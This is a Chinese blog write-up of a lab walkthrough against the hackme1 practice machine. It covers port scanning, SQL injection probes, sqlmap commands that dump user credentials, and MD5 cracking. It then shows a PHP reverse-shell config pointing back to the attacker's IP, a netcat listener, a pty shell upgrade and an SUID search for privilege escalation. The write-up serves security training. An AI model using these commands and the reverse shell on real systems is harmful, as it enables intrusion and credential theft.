Hackme1打靶记录

一、搭建靶场环境

攻击机kali:
IP地址:192.168.232.129

靶机hackme1:

IP地址:192.168.232.140

注意:kali和靶机的IP地址需要在同意局域网中即可(同一个网段,并且要在处于同一个网络模式中)

二、 实战

1.主机发现

arp-scan -l

2.端口扫描

masscan --rate=100000 -p 0-65535 192.168.232.140

 

3.详细扫描

nmap -T4 -sV -O -p 22,80 192.168.232.140

我们发现有两个端口一个是22,另一个是80.

22段口分析

一般只能暴力破解,暂时还没有合适的字典

80端口分析

访问一下看看

 发现可以注册我们注册一个账号进去

 单击search可以进行查看到很多的书名

4.sql注入

4.1验证是否含有SQL注入漏洞

输入:

Windows OS' and 1=1#

Windows OS' and 1=2#

啥都没有,说明存在漏洞

4.2 sqlmap注入攻击

利用burpsuite抓一下看看

 利用sqlmap搞一下

sqlmap -r hack.txt --batch --dbs

 看到这个数据库的信息,这时我们试着对webapphacking爆表。

sqlmap -r hack.txt --batch -D webapphacking --tables

 爆列

sqlmap -r hack.txt --batch -D webapphacking -T users --dump

 现在我们发现这里有用户superadmin.

2386acb2cf356944177746fc92523983解一下这个md5得到用户superadmin的密码:

 5.文件上传漏洞

superadmin用户的信息登入进去
这个是文件上传漏洞。
可以利用kali中自带的webshell,来进行攻击。

 

 打开现在修改参数

将其中的IP修改为自己的kali攻击机的IP

set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.232.129';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

现在我们进行文件上传

 上传的时候进行改一下后缀

ok没毛病可以的

6.kali开启监听

输入:nc -lvp 1234

6.1 访问下上传的文件

 使用python,进入bash
输入:python3 -c 'import pty;pty.spawn("/bin/bash")'

7.权限提升

 查询suid权限程序:find / -perm -u=s -type f 2>/dev/null

 

 发现一个目录可以进行提取/home/legacy/touchmenot

 发现可以的。

总结

本此靶机主要的工具和靶机都很简单,主要涉及的是SQL注入漏洞和文件上传漏洞。
1、sql注入工具:sqlmap
2、抓包工具:burpsuite
3、webshell后门:kali中的后门
4、suid提取:touchmenot提取

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值